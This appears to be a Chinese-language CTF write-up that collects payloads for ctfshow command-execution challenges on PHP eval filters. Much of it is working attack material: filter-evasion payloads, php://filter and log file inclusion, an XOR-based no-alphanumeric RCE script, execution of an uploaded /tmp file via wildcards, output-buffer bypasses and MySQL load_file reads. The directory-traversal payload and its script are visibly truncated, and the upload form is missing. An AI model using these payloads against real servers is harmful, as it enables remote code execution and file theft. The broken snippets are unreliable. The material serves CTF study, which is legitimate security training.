ctfshow命令执行刷题总结

过滤system函数和php

if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }

那还有其他函数可以使用,比如说

passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()

可以使用的payload有

c=echo `nl fl''ag.ph''p`;
c=echo `cat f*`;
c=echo `nl fla''g.p''hp`;
c=echo `nl fla?????`;

过滤了一些敏感命令

    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }

cat被过滤可以用其他的命令来代替,比如

more:一页一页的显示档案内容
less:与 more 类似 head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看 file -f:报错出具体内容 grep

也有相关文件读取函数:

file_get_content()
readfile()
highlight_file()
show_source()

空格过滤绕过姿势:

%09(要有php环境)${IFS}   $IFS$9  <>  \x20

一个骚姿势:

c=eval($_GET[1]);&1=system('nl flag.php');

可以通吃好几关。

过滤了括号

include函数是不需要括号的。利用文件包含来读取flag。

c=include$_POST["a"]?>
a=php://filter/read=convert.base64-encode/resource=flag.php

分号可以用?>来代替,涉及到文件包含姿势也就更多了,大同小异。还可以通过nginx的日志来获取到shell。(日志文件包含)

过滤数字字母(无字母数字RCE)

取反(需要~符号)

举一个实例,构造一个system('ls')这个命令。

ctfshow命令执行刷题总结_第1张图片

得到取反后的结果,因为可能会有不可见字符,所以 url编码一下。构造payload的时候再用~取反回来就行,(取反原理:PHP ~(按位取反)位运算符_Williamslife的博客-CSDN博客_php 按位取反)

异或(需要^符号)

相同数字为0,不同数字为1.比如1^1=0,1^0=0。在进行字符异或时,先转为二进制而进行异或。这样通过两个字符就可以异或为一个新的字符。直接上异或脚本。

import requests
import re

xiao1 = ""
xiao2 = ""
url = 'http://bb034458-7bb2-4376-9947-382f39e45cd1.challenge.ctf.show/'
cit = []         #收集没有被过滤的字符
for i in range(255):
    a = chr(i)
    wer = re.match(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-', a, re.I)
    # print(wer)
    if (wer):
        continue
    else:
        cit.append(i)       #添加元素
pay1 = "system"  # 函数名,如system
pay2 = "cat flag.php"  # 参数,例如ls


def text(a, b):
    global xiao1
    global xiao2
    for i in range(0, len(cit)):
        for j in range(i, len(cit)):
            if cit[i] | cit[j] == ord(b[a]):    #找出哪两个字符异或得到目标字符
                xiao1 += chr(cit[i])   #添加
                xiao2 += chr(cit[j])   #添加
                return

for m in range(0,len(pay1)):  #遍历目标字符串
    text(m,pay1)
data1 = "(\"" + xiao1 + "\"|\"" + xiao2 + "\")"  #需要构造如(system)(ls)的形式所以要加大括号
xiao1 = ""
xiao2 = ""
for m in range(0,len(pay2)):
    text(m,pay2)
data2 = "(\"" + xiao1 + "\"|\"" +xiao2 + "\")"
data = {"c":data1 + data2}
res = requests.post(url=url, data=data).text#收到响应内容
print(res)

自增(需要+字符)

通过自增改变字符的ascli码值来获得新的字符。++'字符1'='字符二'。

骚姿势一(linux系统)

shell下是可以用点来执行任意脚本的,而且不需要执行权限。如果我们上传一个可控的文件,再用点来执行这个文件,对于陌生的上传文件,php会把它放在临时目录/tmp文件夹下,

post上传文件的数据包:




    
    
    POST数据包POC



这种文件的保存路径在linux下一般为/tmp/php??????。在上传的文件中构造命令如下:

#!/bin/sh
ls

上传文件抓包,再传参,怎么传参执行文件呢?构造payload:

?c=.+/???/????????[@-[]

@字符和[字符是大写字母的边界。在这里来匹配大写字母。(相关知识链接:无字母数字webshell之提高篇,)(无字母数字的命令执行(ctfshow web入门 55)_Firebasky的博客-CSDN博客_无字符命令执行)

骚姿势二

利用$()数学运算。linux运行操作看一下。

ctfshow命令执行刷题总结_第2张图片

$((~$(())))运算为-1,那么我们就可以构造任意数字了。麻烦死了。。

ob缓存

看题目代码:

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

只需要exit强制退出即可。如payload:

c=require("/flag.txt");exit();

需要遍历

利用php内置类和glob协议来遍历目录找到flag。相关payload:

c=?>__toString().' ');
} 
exit(0);
?>

遍历脚本:

import requests
url='http://31f2752e-4051-467d-a2b9-8ab036691177.challenge.ctf.show/'
print(requests.post(url,data={'c':'''?>__toString().' ');} exit(0);?>'''}).text)
print(requests.post(url,{'c':f'''?>

利用mysql读取

需要知道数据库名。payload:

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);

通过${PATH}等

可以通过${PATH}等环境变量来截取字符,拼接构造payload。

ctfshow命令执行刷题总结_第3张图片

可以构造我们想要的命令。 除了PATH,还有PWD,HOME,等等。可以结合?通配符使用。

举个例子,构造nl flag.php,payload为

${PATH:14:1}${PATH:5:1} ????.???

参考链接:

可以参考mumuzi师傅的:ctfshow 命令执行 web29-web77 web118-122 web124 wp_是Mumuzi的博客-CSDN博客

你可能感兴趣的:(#,基础漏洞,php,开发语言,web安全)